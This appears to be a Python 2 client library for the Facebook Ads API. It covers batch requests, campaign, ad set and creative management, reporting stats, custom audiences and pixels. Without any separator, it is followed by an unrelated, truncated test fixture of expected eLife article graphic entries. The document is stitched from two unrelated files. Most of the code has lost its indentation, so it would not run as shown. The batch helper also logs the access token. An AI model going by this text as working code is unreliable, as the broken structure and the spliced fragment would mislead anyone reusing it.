self.api_root = '{}/v{}'.format(FACEBOOK_API, version)
else:
self.api_root = FACEBOOK_API
def make_request(self, path, method, args=None, files=None, batch=False, raw_path=False):
"""Makes a request against the Facebook Ads API endpoint."""
args = dict(args or {})
args = {k.encode('utf-8'): unicode(v).encode('utf-8')
for k, v in args.items()}
if batch:
# Then just return a dict for the batch request
return {
'method': method,
'relative_url': '%s?%s' % (path, urllib.urlencode(args))
}
logger.info('Making a %s request at %s/%s with %s' % (method, self.api_root, path, args))
if 'access_token' not in args:
args['access_token'] = self.access_token
try:
if method == 'GET':
url = path if raw_path else '%s/%s?%s' % (self.api_root, path, urllib.urlencode(args))
f = urllib2.urlopen(url)
elif method == 'POST':
url = path if raw_path else '%s/%s' % (self.api_root, path)
if files:
encoder = MultipartFormdataEncoder()
content_type, body = encoder.encode(args, files)
req = urllib2.Request(url, data=body)
req.add_header('Content-Type', content_type)
f = urllib2.urlopen(req)
else:
f = urllib2.urlopen(url, urllib.urlencode(args))
elif method == 'DELETE':
url = path if raw_path else '%s/%s?%s' % (self.api_root, path, urllib.urlencode(args))
req = urllib2.Request(url)
req.get_method = lambda: 'DELETE'
f = urllib2.urlopen(req)
            else:
                raise ValueError('Unsupported HTTP method: %s' % method)
return json.load(f)
except urllib2.HTTPError as e:
err = AdsAPIError(e)
            # Logged at info, not warning or error, because these often occur
            # as an expected result of user input and well-formed requests
            # that Facebook rejects.
logger.info(u'API Error: {}'.format(err.message))
raise err
except urllib2.URLError as e:
logger.warn(u'URLError: %s' % e.reason)
raise
def make_batch_request(self, batch):
"""Makes a batched request against the Facebook Ads API endpoint."""
args = {}
args['access_token'] = self.access_token
args['batch'] = json.dumps(batch)
args = {k.encode('utf-8'): unicode(v).encode('utf-8')
for k, v in args.items()}
logger.info('Making a batched request with %s' % args)
try:
f = urllib2.urlopen(self.api_root, urllib.urlencode(args))
data = json.load(f)
# For debugging
self.data = data
for idx, val in enumerate(data):
data[idx] = json.loads(val['body'])
return data
except urllib2.HTTPError as e:
logger.info('%s' % e)
return json.load(e)
except urllib2.URLError as e:
logger.warn('URLError: %s' % e.reason)
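    # Illustrative batch usage (the account id is a placeholder): each call
    # with batch=True returns a request dict instead of hitting the API,
    # and make_batch_request sends them all in one round trip:
    #   batch = [
    #       api.get_adaccount('1234567890', ['currency'], batch=True),
    #       api.get_adcampaigns('1234567890', 'id,name', batch=True),
    #   ]
    #   account, campaigns = api.make_batch_request(batch)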
# New API
def make_labeled_batch_request(self, batch):
"""Makes a batched request with label against the Facebook Ads API."""
try:
labels = batch.keys()
queries = batch.values()
data = self.make_batch_request(queries)
# For debugging
self.data = data
return dict(zip(labels, data))
except urllib2.HTTPError as e:
            logger.info('%s' % e)
return json.load(e)
except urllib2.URLError as e:
            logger.warn('URLError: %s' % e.reason)
def debug_token(self, token):
"""Returns debug information about the given token."""
path = 'debug_token'
args = {
'input_token': token,
'access_token': '%s|%s' % (self.app_id, self.app_secret)
}
return self.make_request(path, 'GET', args)
def get_adusers(self, account_id, batch=False):
"""Returns the users of the given ad account."""
path = 'act_%s/users' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_adaccount(self, account_id, fields=None, batch=False):
"""Returns the fields of the given ad account."""
path = 'act_%s' % account_id
args = {'fields': fields} if fields else {}
return self.make_request(path, 'GET', args, batch=batch)
def get_adaccounts(self, user_id, fields,
paging_cursors={}, batch=False):
"""Returns the list of Facebook ad accounts."""
path = '%s/adaccounts' % user_id
args = {'fields': fields}
if paging_cursors:
args.update(paging_cursors)
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaign_group(self, campaign_group_id, fields, batch=False):
"""Return the fields for the given ad campaign group."""
path = '%s' % campaign_group_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaign_groups(self, account_id, fields, batch=False):
"""Returns the fields of all ad campaign groups
from the given ad account."""
path = 'act_%s/adcampaign_groups' % account_id
args = {
'fields': fields,
'limit': self.DATA_LIMIT
}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def delete_adcampaign_group(self, campaign_group_id, batch=False):
"""Delete specific campaign group."""
path = '%s' % campaign_group_id
return self.make_request(path, 'DELETE', batch=batch)
def get_adcampaign(self, campaign_id, fields, batch=False):
"""Returns the fields for the given ad campaign."""
path = '%s' % campaign_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaigns_of_campaign_group(self, campaign_group_id, fields,
batch=False):
"""Return the fields of all adcampaigns
from the given adcampaign group."""
path = '%s/adcampaigns' % campaign_group_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adcampaigns_of_account(self, account_id, fields, batch=False):
"""Returns the fields of all ad sets from the given ad account."""
path = 'act_%s/adcampaigns' % account_id
args = {
'fields': fields,
'limit': self.DATA_LIMIT
}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcampaigns(self, account_id, fields=None, batch=False):
"""Returns the fields of all ad sets from the given ad account."""
return self.get_adcampaigns_of_account(account_id, fields, batch=batch)
def get_adgroup(self, adgroup_id, fields=None, batch=False):
"""Returns the fields for the given ad group."""
path = '%s' % adgroup_id
args = {'fields': fields} if fields else {}
return self.make_request(path, 'GET', args, batch=batch)
def get_adgroups_by_adaccount(self, account_id, fields=None,
status_fields=None, batch=False):
"""Returns the fields of all ad groups from the given ad account."""
path = 'act_%s/adgroups' % account_id
args = {'fields': fields} if fields else {}
if status_fields:
args['adgroup_status'] = status_fields
return self.make_request(path, 'GET', args, batch=batch)
def get_adgroups_by_adcampaign(self, campaign_id, fields=None,
status_fields=None, batch=False):
"""Returns the fields of all ad groups from the given ad campaign."""
path = '%s/adgroups' % campaign_id
args = {'fields': fields} if fields else {}
if status_fields:
args['adgroup_status'] = status_fields
return self.make_request(path, 'GET', args, batch=batch)
def get_adcreative(self, creative_id, fields, batch=False):
"""Returns the fields for the given ad creative."""
path = '%s' % creative_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcreatives(self, account_id, fields, batch=False):
"""Returns the fields for the given ad creative."""
path = 'act_%s/adcreatives' % account_id
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcreatives_by_adgroup(self, adgroup_id, fields, batch=False):
"""Returns the fields for the given ad creative."""
path = '{0}/adcreatives'.format(adgroup_id)
args = {'fields': fields}
return self.make_request(path, 'GET', args, batch=batch)
def get_adimages(self, account_id, hashes=None, batch=False):
"""Returns the ad images for the given ad account."""
path = 'act_%s/adimages' % account_id
args = {}
if hashes is not None:
args = {'hashes': hashes}
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_stats_by_adcampaign_group(
self, campaign_group_id, fields=None, filters=None, batch=False,
start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign group."""
args = {}
if fields:
args['fields'] = json.dumps(fields)
if filters:
args['filters'] = json.dumps(filters)
if start_time:
args['start_time'] = self.__parse_time(start_time)
if end_time:
args['end_time'] = self.__parse_time(end_time)
path = '%s/stats' % campaign_group_id
return self.make_request(path, 'GET', args, batch=batch)
def get_stats_by_adaccount(self, account_id, batch=False, start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign group."""
args = {}
start_time = start_time or 0
path = 'act_{0}/stats/{1}'.format(account_id, self.__parse_time(start_time))
if end_time:
path = path + '/{0}'.format(self.__parse_time(end_time))
return iterate_by_page(self.make_request(path, 'GET', args, batch=batch))
def get_stats_by_adcampaign(self, account_id, campaign_ids=None,
batch=False, start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign by adcampaign."""
args = {}
if campaign_ids is not None:
args['campaign_ids'] = json.dumps(campaign_ids)
if start_time:
args['start_time'] = self.__parse_time(start_time)
if end_time:
args['end_time'] = self.__parse_time(end_time)
path = 'act_%s/adcampaignstats' % account_id
return self.make_request(path, 'GET', args, batch=batch)
def get_stats_by_adgroup(
self, account_id, adgroup_ids=None, batch=False,
start_time=None, end_time=None):
"""Returns the stats for a Facebook campaign by adgroup."""
args = {}
if adgroup_ids is not None:
args['adgroup_ids'] = json.dumps(adgroup_ids)
if start_time:
args['start_time'] = self.__parse_time(start_time)
if end_time:
args['end_time'] = self.__parse_time(end_time)
path = 'act_%s/adgroupstats' % account_id
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_time_interval(self, start, end):
"""Returns formatted time interval."""
if not start or not end:
return None
end = end + datetime.timedelta(1)
        if not isinstance(start, datetime.datetime):
            start = datetime.datetime(start.year, start.month, start.day)
        if not isinstance(end, datetime.datetime):
            end = datetime.datetime(end.year, end.month, end.day)
time_interval = dict(
day_start=dict(day=start.day, month=start.month, year=start.year),
day_stop=dict(day=end.day, month=end.month, year=end.year)
)
return json.dumps(time_interval)
def get_adreport_stats(self, account_id, date_preset, time_increment,
data_columns, filters=None, actions_group_by=None,
batch=False):
"""Returns the ad report stats for the given account."""
path = 'act_%s/reportstats' % account_id
args = {
'date_preset': date_preset,
'time_increment': time_increment,
'data_columns': json.dumps(data_columns),
}
if filters is not None:
args['filters'] = json.dumps(filters)
if actions_group_by is not None:
args['actions_group_by'] = actions_group_by
return self.make_request(path, 'GET', args, batch=batch)
# New API
def get_adreport_stats2(self, account_id, data_columns, date_preset=None,
date_start=None, date_end=None,
time_increment=None, actions_group_by=None,
filters=None, async=False, batch=False, offset=None,
sort_by=None, sort_dir=None, summary=None,
limit=None):
"""Returns the ad report stats for the given account."""
        if date_preset is None and date_start is None and date_end is None:
            raise AdsAPIError(
                "Either a date_preset or a date_start/end must be set "
                "when requesting stats info.")
path = 'act_%s/reportstats' % account_id
args = {
'data_columns': json.dumps(data_columns),
}
if date_preset:
args['date_preset'] = date_preset
if offset:
args['offset'] = offset
if date_start and date_end:
args['time_interval'] = \
self.get_time_interval(date_start, date_end)
if time_increment:
args['time_increment'] = time_increment
if filters:
args['filters'] = json.dumps(filters)
if actions_group_by:
args['actions_group_by'] = json.dumps(actions_group_by)
if sort_by:
args['sort_by'] = sort_by
if sort_dir:
args['sort_dir'] = sort_dir
if summary is not None:
args['summary'] = summary
if limit:
args['limit'] = limit
if async:
args['async'] = 'true'
return self.make_request(path, 'POST', args=args, batch=batch)
return self.make_request(path, 'GET', args=args, batch=batch)
# New API
def get_async_job_status(self, job_id, batch=False):
"""Returns the asynchronously requested job status"""
path = '%s' % job_id
return self.make_request(path, 'GET', batch=batch)
# New API
def get_async_job_result(self, account_id, job_id, batch=False):
"""Returns completed result of the given async job"""
path = 'act_%s/reportstats' % account_id
args = {
'report_run_id': job_id
}
return self.make_request(path, 'GET', args=args, batch=batch)
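    # An illustrative async flow built from the three methods above (the
    # 'id' and 'async_percent_completion' response field names are
    # assumptions; check the Ads API reference):
    #   job = api.get_adreport_stats2(account_id, columns,
    #                                 date_preset='yesterday', async=True)
    #   while api.get_async_job_status(job['id']).get(
    #           'async_percent_completion', 0) < 100:
    #       time.sleep(5)
    #   result = api.get_async_job_result(account_id, job['id'])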
def get_conversion_stats_by_adaccount(self, account_id, batch=False):
"""Returns the aggregated conversion stats for the given ad account."""
path = 'act_%s/conversions' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_conversion_stats_by_adcampaign(
self, account_id, campaign_ids=None, include_deleted=False,
start_time=None, end_time=None, aggregate_days=None,
by_impression_time=True, batch=False):
"""Returns the conversions stats for all ad campaigns."""
path = 'act_%s/adcampaignconversions' % account_id
args = {}
if campaign_ids is not None:
args['campaign_ids'] = json.dumps(campaign_ids)
if include_deleted is not None:
args['include_deleted'] = include_deleted
if start_time is not None:
args['start_time'] = start_time
if end_time is not None:
args['end_time'] = end_time
if aggregate_days is not None:
args['aggregate_days'] = aggregate_days
if not by_impression_time:
args['by_impression_time'] = 'false'
return self.make_request(path, 'GET', args, batch=batch)
def get_conversion_stats_by_adgroup(self, account_id, adgroup_ids=None,
include_deleted=False, batch=False):
"""Returns the conversions stats for all ad groups."""
path = 'act_%s/adgroupconversions' % account_id
args = {}
if adgroup_ids is not None:
args['adgroup_ids'] = json.dumps(adgroup_ids)
if include_deleted is not None:
args['include_deleted'] = include_deleted
return self.make_request(path, 'GET', args, batch=batch)
def get_conversion_stats(self, adgroup_id, batch=False):
"""Returns the conversion stats for a single ad group."""
path = '%s/conversions' % adgroup_id
return self.make_request(path, 'GET', batch=batch)
def get_custom_audiences(self, account_id, fields=None, batch=False):
"""Returns the information for a given audience."""
path = 'act_%s/customaudiences' % account_id
args = { 'limit': self.DATA_LIMIT }
if fields: args['fields'] = fields
return self.make_request(path, 'GET', args, batch=batch)
def get_ads_pixels(self, account_id, fields=None, batch=False):
"""Returns the remarketing pixel."""
path = 'act_%s/adspixels' % account_id
args = {'fields': fields} if fields else {}
return self.make_request(path, 'GET', args, batch=batch)
# Deprecated: remove at Oct 1st 2014, breaking change on Facebook.
def get_remarketing_pixel(self, account_id, batch=False):
"""Returns the remarketing pixel."""
logger.warn("This method is deprecated and is replaced with get_ads_pixels.")
path = 'act_%s/remarketingpixelcode' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_offsite_pixel(self, offsite_pixel_id, batch=False):
"""Returns the information for the given offsite pixel."""
path = '%s' % offsite_pixel_id
return self.make_request(path, 'GET', batch=batch)
def get_offsite_pixels(self, account_id, batch=False):
"""Returns the list of offsite pixels for the given account."""
path = 'act_%s/offsitepixels' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_keyword_stats(self, adgroup_id, batch=False):
"""Returns the keyword stats for the given ad group."""
path = '%s/keywordstats' % adgroup_id
return self.make_request(path, 'GET', batch=batch)
def get_ratecard(self, account_id, batch=False):
"""Returns the rate card for Homepage Ads."""
path = 'act_%s/ratecard' % account_id
return self.make_request(path, 'GET', batch=batch)
def get_reach_estimate(self, account_id, targeting_spec, currency=None,
creative_action_spec=None,
bid_for=None, batch=False):
"""Returns the reach estimate for the given currency and targeting."""
path = 'act_%s/reachestimate' % account_id
args = {
'targeting_spec': json.dumps(targeting_spec),
}
if currency is not None:
args['currency'] = json.dumps(currency)
if creative_action_spec is not None:
args['creative_action_spec'] = json.dumps(creative_action_spec)
if bid_for is not None:
args['bid_for'] = bid_for
return self.make_request(path, 'GET', args, batch=batch)
def get_targeting_sentence_lines(self, account_id, targeting_spec, batch=False):
"""Returns FB's description of the targeting spec, provided as a JSON structure."""
path = 'act_%s/targetingsentencelines' % account_id
args = {'targeting_spec': json.dumps(targeting_spec)}
return self.make_request(path, 'GET', args, batch=batch)
def get_adcampaign_list(self, account_id):
"""Returns the list of ad campaigns and related data."""
fields = 'id, name, campaign_status, start_time, end_time, ' \
'daily_budget, lifetime_budget, budget_remaining'
batch = [
self.get_adaccount(account_id, ['currency'], batch=True),
self.get_adcampaigns(account_id, fields, batch=True),
self.get_stats_by_adcampaign(account_id, batch=True),
]
return self.make_batch_request(batch)
def get_adcampaign_detail(self, account_id, campaign_id, date_preset):
"""Returns the detail of an ad campaign."""
campaign_fields = [
'name', 'campaign_status', 'daily_budget', 'lifetime_budget',
'start_time', 'end_time']
campaign_data_columns = [
'campaign_name', 'reach', 'frequency', 'clicks',
'actions', 'total_actions', 'ctr', 'spend']
adgroup_data_columns = [
'campaign_id', 'campaign_name', 'adgroup_id', 'adgroup_name',
'reach', 'frequency', 'clicks', 'ctr', 'actions', 'cpm', 'cpc',
'spend']
demographic_data_columns = [
'campaign_id', 'reach', 'frequency', 'clicks', 'actions', 'spend',
'cpc', 'cpm', 'ctr', 'cost_per_total_action', 'age', 'gender']
placement_data_columns = [
'campaign_id', 'reach', 'frequency', 'clicks', 'actions', 'spend',
'cpc', 'cpm', 'ctr', 'cost_per_total_action', 'placement']
campaign_filters = [{
'field': 'campaign_id', 'type': 'in', 'value': [campaign_id]}]
batch = [
self.get_adaccount(account_id, ['currency'], batch=True),
self.get_adcampaign(campaign_id, campaign_fields, batch=True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', campaign_data_columns,
campaign_filters, ['action_type'], True),
self.get_adreport_stats(
account_id, date_preset, 1, campaign_data_columns,
campaign_filters, None, True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', adgroup_data_columns,
campaign_filters, None, True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', demographic_data_columns,
campaign_filters, None, True),
self.get_adreport_stats(
account_id, date_preset, 'all_days', placement_data_columns,
campaign_filters, None, True),
]
return self.make_batch_request(batch)
def get_user_pages(self, user_id, fields=None, batch=False):
"""Returns the list of pages to which user has access with tokens."""
path = '%s/accounts' % user_id
args = {}
if fields:
args['fields'] = json.dumps(fields)
return self.make_request(path, 'GET', args, batch=batch)
# This appears to be deprecated.
def get_autocomplete_data(self, q, type, want_localized_name=False,
list=None, limit=None, batch=False):
"""Returns the autocomplete data for the given query and type."""
path = '%s/search' % q
args = {'type': type}
if want_localized_name:
args['want_localized_name'] = want_localized_name
if list:
args['list'] = list
if limit:
args['limit'] = limit
return self.make_request(path, 'GET', args, batch=batch)
def get_search(self, type, params, batch=False):
""" Performs a generic Facebook search, e.g. for geolocations, interests """
path = 'search'
args = {'type': type}
args.update(params)
return self.make_request(path, 'GET', args, batch=batch)
def get_page_access_token(self, page_id, batch=False):
"""Returns the page access token for the given page."""
path = '%s' % page_id
args = {'fields': 'access_token'}
return self.make_request(path, 'GET', args, batch=batch)
def get_page_post(self, page_post_id, fields=None, batch=False):
"""Returns data for the give page post."""
path = '%s' % page_post_id
args = {}
if fields:
args['fields'] = json.dumps(fields)
return self.make_request(path, 'GET', args, batch=batch)
def create_adimage(self, account_id, image_data, batch=False):
"""Creates an ad image in the given ad account."""
path = 'act_%s/adimages' % account_id
files = {image_data.name: image_data}
return self.make_request(path, 'POST', None, files, batch=batch)
def create_link_page_post(self, page_id, link=None, message=None, picture=None,
thumbnail=None, name=None, caption=None,
description=None, published=None, call_to_action=None, batch=False):
"""Creates a link page post on the given page."""
page_access_token = self.get_page_access_token(page_id)
if 'error' in page_access_token:
return page_access_token
if 'access_token' not in page_access_token:
raise AdsAPIError('Could not get page access token. (Do you have manage pages permission?)')
path = '%s/feed' % page_id
args = {
'access_token': page_access_token['access_token'],
}
files = {}
if link is not None:
args['link'] = link
if message is not None:
args['message'] = message
if picture is not None:
args['picture'] = picture
if thumbnail is not None:
files['thumbnail'] = thumbnail
if published is not None:
args['published'] = published
if name is not None:
args['name'] = name
if caption is not None:
args['caption'] = caption
if description is not None:
args['description'] = description
if call_to_action is not None:
args['call_to_action'] = json.dumps(call_to_action)
return self.make_request(path, 'POST', args, files, batch=batch)
def create_video_page_post(self, page_id, source, title=None,
description=None, thumb=None, published=True,
scheduled_publish_time=None, batch=False):
# TODO: this method is calling the API twice; combine them into batch
page_access_token = self.get_page_access_token(page_id)
path = '%s/videos' % page_id
args = {
'published': published,
'access_token': page_access_token['access_token'],
}
files = {'source': source}
if title is not None:
args['title'] = title
if description is not None:
args['description'] = description
if thumb is not None:
files['thumb'] = thumb
if scheduled_publish_time is not None:
args['scheduled_publish_time'] = scheduled_publish_time
return self.make_request(path, 'POST', args, files, batch=batch)
def create_adcampaign_group(self, account_id, name, campaign_group_status,
objective=None, batch=False):
"""Creates an ad campaign group for the given account."""
path = 'act_%s/adcampaign_groups' % account_id
args = {
'name': name,
'campaign_group_status': campaign_group_status,
}
if objective is not None:
args['objective'] = objective
return self.make_request(path, 'POST', args, batch=batch)
def update_adcampaign_group(self, campaign_group_id, name=None,
campaign_group_status=None, objective=None,
batch=False):
"""Updates condition of the given ad campaign group."""
path = '%s' % campaign_group_id
args = {}
if name is not None:
args['name'] = name
if campaign_group_status is not None:
args['campaign_group_status'] = campaign_group_status
if objective is not None:
args['objective'] = objective
return self.make_request(path, 'POST', args, batch=batch)
def create_adset(self, account_id, campaign_group_id, name,
campaign_status, daily_budget=None, lifetime_budget=None,
start_time=None, end_time=None,
bid_type=None, bid_info=None, promoted_object=None, targeting=None, batch=False):
"""
Creates an adset (formerly called ad campaign) for the given account and the campaign (formerly called "campaign group").
"""
        if daily_budget is None and lifetime_budget is None:
            raise AdsAPIError(
                "Either a lifetime_budget or a daily_budget must be set "
                "when creating a campaign")
        if lifetime_budget is not None and end_time is None:
            raise AdsAPIError(
                "end_time is required when lifetime_budget is specified")
path = 'act_%s/adcampaigns' % account_id
args = {
'campaign_group_id': campaign_group_id,
'name': name,
'campaign_status': campaign_status,
}
if daily_budget:
args['daily_budget'] = daily_budget
if lifetime_budget:
args['lifetime_budget'] = lifetime_budget
if start_time:
args['start_time'] = start_time
if end_time:
args['end_time'] = end_time
if bid_type:
args['bid_type'] = bid_type
if bid_info:
args['bid_info'] = bid_info
if promoted_object:
args['promoted_object'] = json.dumps(promoted_object)
if targeting:
args['targeting'] = json.dumps(targeting)
return self.make_request(path, 'POST', args, batch=batch)
def update_adset(self, campaign_id, name=None, campaign_status=None,
daily_budget=None, lifetime_budget=None,
start_time=None, end_time=None,
bid_type=None, bid_info=None, promoted_object=None, targeting=None, batch=False):
"""Updates the given adset."""
path = '%s' % campaign_id
args = {}
if name:
args['name'] = name
if campaign_status:
args['campaign_status'] = campaign_status
if daily_budget:
args['daily_budget'] = daily_budget
if lifetime_budget:
args['lifetime_budget'] = lifetime_budget
if start_time:
args['start_time'] = start_time
if end_time is not None:
args['end_time'] = end_time
if bid_type:
args['bid_type'] = bid_type
if bid_info:
args['bid_info'] = bid_info
if promoted_object:
args['promoted_object'] = json.dumps(promoted_object)
if targeting:
args['targeting'] = json.dumps(targeting)
return self.make_request(path, 'POST', args, batch=batch)
# New API
def delete_adcampaign(self, campaign_id, batch=False):
"""Delete the given ad campaign."""
path = '%s' % campaign_id
return self.make_request(path, 'DELETE', batch=batch)
def create_adcreative(self, account_id, name=None, object_story_id=None, object_story_spec=None, batch=False):
"""Creates an ad creative in the given ad account."""
path = 'act_%s/adcreatives' % account_id
args = {}
if name:
args['name'] = name
if object_story_id:
args['object_story_id'] = object_story_id
if object_story_spec:
args['object_story_spec'] = json.dumps(object_story_spec)
return self.make_request(path, 'POST', args, batch=batch)
def create_adgroup(self, account_id, name, campaign_id,
creative_id, bid_type=None, bid_info=None, max_bid=None,
tracking_specs=None, view_tags=None, objective=None,
adgroup_status=None, targeting=None, conversion_specs=None, batch=False):
"""Creates an adgroup in the given ad camapaign with the given spec."""
path = 'act_%s/adgroups' % account_id
args = {
'name': name,
'campaign_id': campaign_id,
'creative': json.dumps({'creative_id': creative_id}),
}
if bid_type:
args['bid_type'] = bid_type
if max_bid:
# can only use max_bid with CPM bidding
args['max_bid'] = max_bid
elif bid_info:
args['bid_info'] = json.dumps(bid_info)
if tracking_specs:
args['tracking_specs'] = json.dumps(tracking_specs)
if view_tags:
args['view_tags'] = json.dumps(view_tags)
if objective:
args['objective'] = objective
if adgroup_status:
args['adgroup_status'] = adgroup_status
if targeting:
args['targeting'] = json.dumps(targeting)
if conversion_specs:
args['conversion_specs'] = json.dumps(conversion_specs)
return self.make_request(path, 'POST', args, batch=batch)
def update_adgroup(self, adgroup_id, name=None, adgroup_status=None,
bid_type=None, bid_info=None, creative_id=None,
tracking_specs=None, view_tags=None, objective=None,
targeting=None, conversion_specs=None,
batch=False):
"""Updates condition of the given ad group."""
path = "%s" % adgroup_id
args = {}
if name:
args['name'] = name
if bid_type:
args['bid_type'] = bid_type
if bid_info:
args['bid_info'] = json.dumps(bid_info)
if creative_id:
args['creative'] = json.dumps({'creative_id': creative_id})
if tracking_specs:
args['tracking_specs'] = json.dumps(tracking_specs)
if view_tags:
args['view_tags'] = json.dumps(view_tags)
if objective:
args['objective'] = objective
if adgroup_status:
args['adgroup_status'] = adgroup_status
if targeting:
args['targeting'] = json.dumps(targeting)
if conversion_specs:
args['conversion_specs'] = json.dumps(conversion_specs)
return self.make_request(path, 'POST', args, batch=batch)
def create_custom_audience(self, account_id, name, subtype=None,
description=None, rule=None, opt_out_link=None,
retention_days=30, batch=False):
"""Create a custom audience for the given account."""
path = "act_%s/customaudiences" % account_id
args = {
'name': name,
}
if subtype:
args['subtype'] = subtype
if description:
args['description'] = description
if rule:
args['rule'] = json.dumps(rule)
if opt_out_link:
args['opt_out_link'] = opt_out_link
if retention_days:
args['retention_days'] = retention_days
return self.make_request(path, 'POST', args, batch=batch)
def add_users_to_custom_audience(self, custom_audience_id, tracking_ids,
schema='MOBILE_ADVERTISER_ID', app_ids=None, batch=False):
"""
Adds users to a Custom Audience, based on a list of unique user
tracking ids. There is a limit imposed by Facebook that only 10000
users may be uploaded at a time.
@param schema Allowed values are "UID", "EMAIL_SHA256", "PHONE_SHA256",
"MOBILE_ADVERTISER_ID"
@param app_ids List of app ids. This is required for schema type UID, as of API v2.2
"""
path = "%s/users" % custom_audience_id
payload = {'schema': schema, 'data': tracking_ids}
if app_ids:
payload['app_ids'] = app_ids
args = {
'payload': json.dumps(payload)
}
return self.make_request(path, 'POST', args, batch)
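# Hedged usage sketch (the `api`, `audience_id` and `ids` names are
# hypothetical): since Facebook caps each upload at 10000 users, callers
# typically chunk their tracking ids:
# for start in range(0, len(ids), 10000):
#     api.add_users_to_custom_audience(audience_id, ids[start:start + 10000])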
def create_custom_audience_pixel(self, account_id, batch=False):
"""Create a custom audience pixel for the given account.
This method only needed once per ad account."""
path = "act_%s/adspixels" % account_id
return self.make_request(path, 'POST', batch=batch)
def create_custom_audience_from_website(
self, account_id, name, domain, description=None,
retention_days=30, prefill=True, batch=False):
"""Create a custom audience from website for the given account."""
path = "act_%s/customaudiences" % account_id
args = {
'name': name,
'subtype': "WEBSITE"
}
rule = {'url': {
'i_contains': domain,
}}
if rule:
args['rule'] = json.dumps(rule)
if retention_days:
args['retention_days'] = retention_days
if prefill:
args['prefill'] = prefill
return self.make_request(path, 'POST', args, batch=batch)
def create_lookalike_audience(self, account_id, name, audience_id,
lookalike_spec, batch=False):
"""Create a lookalike audience for the given target audience."""
path = "act_%s/customaudiences" % account_id
args = {
'name': name,
'origin_audience_id': audience_id,
'lookalike_spec': json.dumps(lookalike_spec),
}
return self.make_request(path, 'POST', args, batch)
def create_offsite_pixel(self, account_id, name, tag, batch=False):
"""Creates an offsite pixel for the given account."""
path = 'act_%s/offsitepixels' % account_id
args = {
'name': name,
'tag': tag,
}
return self.make_request(path, 'POST', args, batch=batch)
def get_connection_objects(self, account_id,
business_id=None, batch=False):
"""
Returns Facebook connection objects for the given account.
Params:
business_id - restrict the query to a particular business
"""
path = 'act_{}/connectionobjects'.format(account_id)
args = {}
if business_id:
args['business_id'] = business_id
return self.make_request(path, 'GET', args, batch=batch)
def get_broad_targeting_categories(self, account_id,
user_adclusters=None,
excluded_user_adclusters=None,
batch=False):
"""
Get broad targeting categories for the given account
Params:
user_adclusters - Array of ID-name pairs to include.
excluded_user_adclusters - Array of ID-name pairs to exclude.
"""
path = 'act_{}/broadtargetingcategories'.format(account_id)
args = {}
if user_adclusters:
args['user_adclusters'] = user_adclusters
if excluded_user_adclusters:
args['excluded_user_adclusters'] = excluded_user_adclusters
return self.make_request(path, 'GET', args, batch=batch)
def __parse_time(self, time_obj):
"""Internal function to transform user supplied time objects into Unix time."""
if time_obj:
resp = ''
if isinstance(time_obj, (int, str)):
resp = time_obj
elif isinstance(time_obj, datetime.datetime):
resp = calendar.timegm(time_obj.timetuple())
else:
raise Exception("Unknown __parse_time format for {0}".format(time_obj))
return str(resp)
return None
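# Hedged examples of the accepted inputs (values hypothetical):
# __parse_time(1480000000)                      -> '1480000000'
# __parse_time('1480000000')                    -> '1480000000'
# __parse_time(datetime.datetime(2016, 11, 24)) -> '1479945600' (UTC epoch)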
def iterate_by_page(response):
"""
Generator function that will return one Facebook results page at a time
Note: Other than ensuring we don't crash, we accept facebook responses
regardless of whether they contain paging information or not.
Params:
response - A Facebook Ads API response body that includes pagination
sections.
Yields:
An unadulterated page of Facebook response data, including data and any
provided pagination info.
"""
while True:
yield response
next_page = response.get('paging', {}).get('next', '')
if not next_page:
break
response = json.load(urllib2.urlopen(next_page))
def iterate_by_item(response):
"""
Generator function that will return one Facebook results item at a time
Note: Other than ensuring we don't crash, we accept facebook responses
regardless of whether they contain paging information or not.
Params:
response - A Facebook Ads API response body that includes pagination
sections.
Yields:
An item from the Facebook response data. It automatically advances
through any additional pages that Facebook provides.
"""
while True:
for r in response.get('data', []):
yield r
next_page = response.get('paging', {}).get('next', '')
if not next_page:
break
response = json.load(urllib2.urlopen(next_page))
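# Hedged usage sketch (the `api`, `account_id` and `process` names are
# hypothetical):
# response = api.get_connection_objects(account_id)  # any paginated response
# for page in iterate_by_page(response):
#     ...                                             # one raw page at a time
# for item in iterate_by_item(response):
#     process(item)                                   # one data item at a time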
|
|
# output from elife00013.xml
expected = [
{
"xlink_href": "elife00013f001",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 1,
"parent_sibling_ordinal": 1,
"parent_component_doi": "10.7554/eLife.00013.003",
"position": 1,
"ordinal": 1,
},
{
"xlink_href": "elife00013fs001",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 2,
"parent_asset": "figsupp",
"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.004",
"p_parent_type": "fig",
"p_parent_ordinal": 1,
"p_parent_sibling_ordinal": 1,
"p_parent_component_doi": "10.7554/eLife.00013.003",
"position": 2,
"ordinal": 2,
},
{
"xlink_href": "elife00013f002",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 3,
"parent_sibling_ordinal": 2,
"parent_component_doi": "10.7554/eLife.00013.006",
"position": 3,
"ordinal": 3,
},
{
"xlink_href": "elife00013f003",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 4,
"parent_sibling_ordinal": 3,
"parent_component_doi": "10.7554/eLife.00013.008",
"position": 4,
"ordinal": 4,
},
{
"xlink_href": "elife00013fs002",
"type": "graphic",
"parent_type": "fig",
"parent_ordinal": 5,
"parent_asset": "figsupp",
